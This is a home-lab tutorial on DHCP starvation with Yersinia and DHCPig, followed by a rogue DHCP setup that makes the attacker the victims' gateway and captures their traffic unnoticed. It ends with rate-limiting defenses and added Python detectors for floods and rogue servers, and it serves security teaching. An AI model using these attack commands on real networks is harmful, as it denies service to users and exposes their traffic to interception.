
# DHCP Starvation Attack

## DHCP Starvation Attack – Complete Home Lab Guide

* Use a tool like Yersinia to launch a DHCP starvation attack against a target system.
* Analyze the response to determine if the attack was successful.

### First: What DHCP Is and Why It Matters

Before the attack, understand what DHCP actually does.

When any device connects to a network — your phone, laptop, anything — it needs an IP address to communicate. DHCP is the system that automatically hands out these IP addresses. Think of it like a hotel receptionist who gives room keys to guests when they check in.

```
Your Device joins network → Says "I need an IP address please"
DHCP Server hears this   → Checks available IPs in its pool
DHCP Server replies      → "Here, use 192.168.56.50, it's yours for 24 hours"
Your Device              → Now has an IP and can communicate
```

The DHCP server has a **limited pool** of IP addresses it can hand out. For example it might have addresses from `192.168.56.1` to `192.168.56.254` — that's only 253 addresses total.

### What DHCP Starvation Does

DHCP Starvation exploits one simple weakness — **the DHCP server hands out addresses based on MAC addresses, and MAC addresses can be faked**.

The attack works like this:

```
Attacker pretends to be thousands of different devices
Each fake device asks for an IP address
DHCP server hands out real IPs to each fake request
Pool runs out of available IPs
Real legitimate devices join the network
DHCP server has nothing left to give them
Real devices cannot connect — they are starved out
```

Going back to the hotel analogy — imagine someone walks up to the receptionist with thousands of fake IDs and books every single room. Now real guests arrive and there are no rooms left for them.

```
Normal situation:
Pool: [.50][.51][.52][.53]...[.254]  — 200 addresses available
Real devices get addresses fine

After starvation attack:
Pool: [GONE][GONE][GONE][GONE]...[GONE]  — all taken by fake requests
Real device joins — sorry no addresses available
Real device cannot get on network
```

### Why Real Attackers Use This

In real attacks DHCP starvation is rarely the end goal. It is usually **step one of a bigger attack** called a Rogue DHCP attack:

```
Step 1: Attacker runs DHCP starvation
        → Legitimate DHCP server runs out of addresses
        → Real DHCP server is effectively dead

Step 2: Attacker sets up their OWN fake DHCP server
        → New devices join network looking for IP addresses
        → Attacker's fake server responds first
        → Attacker gives out IPs but also sets THEMSELVES as the gateway

Step 3: All traffic from victim devices now routes through attacker
        → Attacker sees all passwords, cookies, emails
        → This is a full Man in the Middle attack
        → Victims have no idea this is happening
```

This is how attackers in coffee shops, hotels, and corporate networks intercept traffic without touching any device directly.

### Lab Architecture

```
VirtualBox Host-Only Network: 192.168.56.0/24

┌─────────────────┐     ┌─────────────────┐     ┌─────────────────┐
│   Kali Linux    │     │  Ubuntu Server  │     │   Victim VM     │
│  (Attacker)     │────▶│  (DHCP Server)  │◀────│ (Any Linux/Win) │
│ 192.168.56.101  │     │ 192.168.56.102  │     │ Gets IP via DHCP│
│                 │     │ Running dnsmasq │     │                 │
└─────────────────┘     └─────────────────┘     └─────────────────┘
        All three on same Host-Only network adapter
```

{% stepper %}
{% step %}

### Step 1 – Set Up DHCP Server on Ubuntu

**Install dnsmasq (handles both DNS and DHCP):**

```bash
sudo apt update
sudo apt install dnsmasq -y
```

**Configure dnsmasq as DHCP server:**

```bash
sudo nano /etc/dnsmasq.conf
```

Add these lines:

```
# DHCP configuration
dhcp-range=192.168.56.50,192.168.56.150,12h
# This gives out IPs from .50 to .150
# Only 100 addresses in the pool
# 12h means lease lasts 12 hours

dhcp-option=3,192.168.56.1        # default gateway
dhcp-option=6,192.168.56.102      # DNS server

# Log all DHCP activity so we can watch the attack
log-dhcp
log-facility=/var/log/dnsmasq.log

interface=eth0
bind-interfaces
```

**Restart dnsmasq:**

```bash
sudo systemctl restart dnsmasq
sudo systemctl status dnsmasq
```

**Verify DHCP is working before the attack:**

```bash
# Watch the DHCP log in real time
sudo tail -f /var/log/dnsmasq.log
```

{% endstep %}

{% step %}

### Step 2 – Install Yersinia on Kali

Yersinia is a network protocol attack tool that specializes in Layer 2 attacks including DHCP starvation.

```bash
sudo apt update
sudo apt install yersinia -y

# Verify installation
yersinia --version
```

**Also install additional tools we will use:**

```bash
sudo apt install dhcpig macchanger nmap -y
```

{% endstep %}

{% step %}

### Step 3 – Understand What Yersinia Will Do

Before launching, understand the DHCP conversation that happens normally:

```
DISCOVER  → Device broadcasts "Anyone have an IP for me?"
OFFER     → DHCP server replies "Yes I have 192.168.56.55 for you"
REQUEST   → Device says "Yes please I want that IP"
ACK       → DHCP server confirms "It is yours, lease starts now"
```

This is called the **DORA process** — Discover, Offer, Request, Acknowledge.

Yersinia will spam thousands of fake DISCOVER and REQUEST messages, each with a different spoofed MAC address. The server will hand out a real IP for each one and eventually run out.
{% endstep %}

{% step %}

### Step 4 – Launch DHCP Starvation with Yersinia

{% tabs %}
{% tab title="Method 1 – Yersinia Graphical Interface" %}

```bash
sudo yersinia -G
```

In the GUI:

```
1. Click "Launch Attack" in the menu
2. Select "DHCP" tab
3. Choose "sending DISCOVER packets"
4. Set interface to eth0
5. Click "OK"
```

{% endtab %}

{% tab title="Method 2 – Yersinia Command Line (recommended for learning)" %}

```bash
# Check your network interface name first
ip addr show

# Launch DHCP starvation attack
sudo yersinia dhcp -attack 1 -interface eth0

# attack 1 = DHCP starvation (sending mass DISCOVER packets)
# This floods the DHCP server with fake requests
```

{% endtab %}

{% tab title="Method 3 – Interactive mode (best for understanding)" %}

```bash
sudo yersinia -I

# Inside interactive mode:
# Press h for help
# Press F2 to select DHCP protocol  
# Press x to see attack options
# Press 1 to launch DHCP starvation
# Press q to quit
```

{% endtab %}
{% endtabs %}
{% endstep %}

{% step %}

### Step 5 – Watch the Attack Happening in Real Time

Open multiple terminals to watch everything simultaneously.

**Terminal 1 – Watch DHCP leases being handed out on Ubuntu:**

```bash
sudo tail -f /var/log/dnsmasq.log
```

You will see entries flooding in like:

```
DHCPDISCOVER from aa:bb:cc:dd:ee:01 
DHCPOFFER 192.168.56.50 to aa:bb:cc:dd:ee:01
DHCPREQUEST for 192.168.56.50 from aa:bb:cc:dd:ee:01
DHCPACK 192.168.56.50 to aa:bb:cc:dd:ee:01

DHCPDISCOVER from aa:bb:cc:dd:ee:02
DHCPOFFER 192.168.56.51 to aa:bb:cc:dd:ee:02
...continuing for hundreds of fake MACs...
```

**Terminal 2 – Watch the DHCP pool getting exhausted:**

```bash
# Check current leases on Ubuntu server
cat /var/lib/misc/dnsmasq.leases
```

Count the leases:

```bash
wc -l /var/lib/misc/dnsmasq.leases
```

Watch this number climb from 0 to 100 (pool exhausted).

**Terminal 3 – Monitor network traffic on Kali:**

```bash
sudo tcpdump -i eth0 port 67 or port 68 -v
# Port 67 = DHCP server port
# Port 68 = DHCP client port
```
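
The flood visible in the DHCP log can raise an alert instead of being watched by eye. This added example (not part of the original guide or of dnsmasq) counts never-before-seen MAC addresses sending DISCOVER inside a sliding window; the syslog line layout, the thresholds and the sample lines are assumptions constructed for the demo.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed dnsmasq syslog layout: "Mar  3 10:15:01 dnsmasq-dhcp[812]: DHCPDISCOVER(eth0) <mac>"
DISCOVER = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}).*?\bDHCPDISCOVER\b.*?"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

def find_starvation(lines, window_s=10, max_new_macs=20, year=2024):
    """Return (time, count) once more than max_new_macs never-seen MACs send
    DISCOVER within window_s seconds; return None if that never happens."""
    seen = set()
    recent = deque()                      # first-seen times still inside the window
    for line in lines:
        m = DISCOVER.search(line)
        if not m:
            continue                      # OFFER/REQUEST/ACK and unrelated lines
        mac = m["mac"].lower()
        if mac in seen:
            continue                      # a known client retrying is normal
        seen.add(mac)
        # syslog timestamps carry no year, so the caller supplies one
        now = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        recent.append(now)
        while now - recent[0] > timedelta(seconds=window_s):
            recent.popleft()
        if len(recent) > max_new_macs:
            return now, len(recent)
    return None

def sample_log():
    """Constructed log: two ordinary clients, then 30 new MACs in three seconds."""
    head = "dnsmasq-dhcp[812]:"
    log = [f"Mar  3 09:00:00 {head} DHCPDISCOVER(eth0) 08:00:27:11:22:33",
           f"Mar  3 09:00:00 {head} DHCPOFFER(eth0) 192.168.56.50 08:00:27:11:22:33",
           f"Mar  3 09:30:12 {head} DHCPDISCOVER(eth0) 08:00:27:44:55:66"]
    for i in range(30):
        log.append(f"Mar  3 10:15:{1 + i // 10:02d} {head} "
                   f"DHCPDISCOVER(eth0) 02:00:00:00:00:{i:02x}")
    log.append(f"Mar  3 10:15:04 {head} DHCPDISCOVER(eth0) 08:00:27:11:22:33")
    return log

if __name__ == "__main__":
    print(find_starvation(sample_log()))
```

Because the detector keys on DISCOVER lines, it fires whether or not the spoofed clients go on to complete the handshake.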

{% endstep %}

{% step %}

### Step 6 – Confirm Attack Success

**Check if pool is exhausted on Ubuntu:**

```bash
# Count active leases
wc -l /var/lib/misc/dnsmasq.leases

# If this equals your pool size (100 in our config) — attack succeeded
```

**Try to get a new IP from victim machine:**

On your third VM (victim) or from Kali:

```bash
# Release current IP and request a new one
sudo dhclient -r eth0      # release current IP
sudo dhclient eth0         # request new IP
```

If the attack succeeded, you will see:

```
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 12
# Keeps retrying but never gets a response
# No IP address assigned
# Device cannot connect to network
```

That is DHCP starvation confirmed — the pool is empty.
{% endstep %}

{% step %}

### Step 7 – Take It Further – Rogue DHCP Attack

Now demonstrate why starvation is step one of a bigger attack.

**While legitimate DHCP server is starved, start rogue DHCP on Kali:**

```bash
# Install and configure a rogue DHCP server on Kali
sudo apt install isc-dhcp-server -y

sudo nano /etc/dhcp/dhcpd.conf
```

Add this config:

```
subnet 192.168.56.0 netmask 255.255.255.0 {
  range 192.168.56.200 192.168.56.220;
  
  # THIS IS THE ATTACK
  # We tell victims to use US as their gateway
  # All their traffic routes through us
  option routers 192.168.56.101;          # Kali IP = fake gateway
  option domain-name-servers 192.168.56.101;  # Kali as DNS too
  
  default-lease-time 600;
  max-lease-time 7200;
}
```

```bash
# Start the rogue DHCP server
sudo systemctl start isc-dhcp-server
```

Now when the victim tries to get an IP, they get one from the attacker's rogue server, with the attacker's IP as their gateway. All traffic flows through Kali.

**Enable IP forwarding on Kali so victims still have internet (they won't notice):**

```bash
# "sudo echo 1 > file" fails: the redirect runs in the unprivileged shell
sudo sysctl -w net.ipv4.ip_forward=1

# Forward their traffic while we inspect it
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```

**Capture victim traffic:**

```bash
sudo tcpdump -i eth0 -w /tmp/victim_traffic.pcap
```

The victim has internet access and suspects nothing while every packet they send goes through the attacker.
{% endstep %}

{% step %}

### Step 8 – Alternative Tool DHCPig

If Yersinia gives issues, DHCPig is simpler:

```bash
# Install
sudo apt install dhcpig -y

# Launch starvation
sudo pig.py eth0

# Watch it exhaust the pool
```

{% endstep %}

{% step %}

### Step 9 – Defense Against DHCP Starvation

After the attack, implement defenses and verify they work.

**Defense 1 – DHCP Snooping (on managed switches in real networks):**

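A home lab has no managed switch, so we approximate the rate-limiting part of DHCP snooping with iptables on the server:

```bash
# On Ubuntu DHCP server
# Rate limit DHCP requests reaching dnsmasq. hashlimit has no per-MAC mode
# (valid modes: srcip, srcport, dstip, dstport), and every starvation request
# carries a new spoofed MAC anyway, so use one shared bucket for all clients.
sudo iptables -A INPUT -p udp --dport 67 \
  -m hashlimit \
  --hashlimit-name dhcp \
  --hashlimit-above 5/minute \
  -j DROP
```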

**Defense 2 – Limit lease pool and set short lease times:**

```bash
sudo nano /etc/dnsmasq.conf

# Change lease time to very short
dhcp-range=192.168.56.50,192.168.56.150,2m
# 2 minute leases means fake leases expire quickly
```

**Defense 3 – Static IP reservations for known devices:**

```bash
# In dnsmasq.conf, reserve IPs for known MAC addresses
dhcp-host=aa:bb:cc:dd:ee:ff,192.168.56.50,hostname
# Ignore clients that have no dhcp-host entry, so unknown MACs get nothing
dhcp-ignore=tag:!known
```

**Verify defense works:**

```bash
# Run yersinia attack again
sudo yersinia dhcp -attack 1 -interface eth0

# Watch the log — requests should be rate limited now
sudo tail -f /var/log/dnsmasq.log
```
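
Rate limits and reservations protect the pool, but they do not reveal the rogue server from Step 7. This added example (not from the original guide) parses a captured DHCP reply and flags a server identifier (option 54) or router (option 3) that is not on an allowlist; the function names are hypothetical and the sample packets are constructed from the lab addresses.

```python
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"   # DHCP magic cookie that follows the 236-byte BOOTP header
OFFER, ACK = 2, 5             # values of option 53 (message type)

def parse_options(payload):
    """Return {option_code: value_bytes} from a DHCP UDP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(payload) and payload[i] != 255:       # 255 = end option
        if payload[i] == 0:                             # 0 = pad, has no length byte
            i += 1
            continue
        if i + 2 > len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated option")
        opts[payload[i]] = payload[i + 2:i + 2 + payload[i + 1]]
        i += 2 + payload[i + 1]
    return opts

def ips(value):
    """Split an option value into dotted-quad strings, four bytes each."""
    return [socket.inet_ntoa(value[j:j + 4]) for j in range(0, len(value) - 3, 4)]

def audit_reply(payload, known_servers, known_routers):
    """Return findings for an OFFER/ACK naming an unexpected server or gateway."""
    opts = parse_options(payload)
    if (opts.get(53) or b"\x00")[0] not in (OFFER, ACK):
        return []                                       # client message, nothing to audit
    findings = []
    server = ips(opts.get(54, b""))
    if not server or server[0] not in known_servers:
        findings.append(f"unknown DHCP server {server[0] if server else 'missing'}")
    for router in ips(opts.get(3, b"")):
        if router not in known_routers:
            findings.append(f"unexpected gateway {router}")
    return findings

def sample_reply(msg_type, server, router):
    """Constructed reply for the demo: BOOTP header plus options 53, 54 and 3."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 2, 1, 6, 0, 0x1234, 0, 0,
                         b"", socket.inet_aton("192.168.56.60"), b"", b"",
                         bytes.fromhex("080027aabbcc"), b"", b"")
    opts = bytes([53, 1, msg_type, 54, 4]) + socket.inet_aton(server)
    opts += bytes([3, 4]) + socket.inet_aton(router) + b"\xff"
    return header + MAGIC + opts
```

Feed it the UDP payloads of port 67/68 traffic captured on the client segment, with the lab's real server (`192.168.56.102`) and gateway (`192.168.56.1`) as the allowlists.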

{% endstep %}
{% endstepper %}

### What You Should See at Each Stage

```
Stage 1 — Before attack:
  DHCP pool: 100 addresses available
  Victim gets IP: instantly, works fine

Stage 2 — During attack (Yersinia running):
  DHCP log: flooding with fake MAC requests
  Pool: draining rapidly, 100→50→10→0
  Yersinia terminal: sending thousands of packets

Stage 3 — Pool exhausted:
  Victim tries to connect: keeps sending DISCOVER
  Server log: DHCPNAK or silence — nothing to offer
  Victim: no IP, cannot use network

Stage 4 — Rogue DHCP running:
  Victim connects: gets IP from attacker's server
  Victim's gateway: points to Kali
  Attacker: sees all victim traffic in tcpdump
```

### Quick Reference

| Tool            | Command                                   | Purpose                     |
| --------------- | ----------------------------------------- | --------------------------- |
| Yersinia CLI    | `yersinia dhcp -attack 1 -interface eth0` | Launch starvation           |
| Yersinia GUI    | `yersinia -G`                             | Graphical attack            |
| DHCPig          | `pig.py eth0`                             | Alternative starvation tool |
| Watch leases    | `tail -f /var/log/dnsmasq.log`            | See pool draining           |
| Count leases    | `wc -l /var/lib/misc/dnsmasq.leases`      | Confirm exhaustion          |
| Victim test     | `dhclient -r eth0 && dhclient eth0`       | Confirm denial              |
| Capture traffic | `tcpdump -i eth0 port 67 or 68`           | Watch DHCP packets          |

### How Real Attackers Use This

In real corporate environments this attack is particularly dangerous for three reasons.

First, most organizations use unmanaged or poorly configured switches that have no DHCP snooping enabled — meaning there is nothing stopping a rogue DHCP server from responding to clients.

Second, once an attacker has positioned themselves as the gateway through the rogue DHCP step, they can perform SSL stripping attacks to downgrade HTTPS connections to HTTP and read credentials in plain text, even on supposedly secure websites. Sites that enforce HSTS are not downgraded this way in browsers that already hold the policy.

Third, this attack requires only physical or WiFi access to the network segment — an attacker who walks into an office, plugs in a Raspberry Pi, and leaves has everything they need running automatically. This is why penetration testers specifically test for DHCP snooping configuration during network security assessments.

Lab Completed!

Thank you for reading.


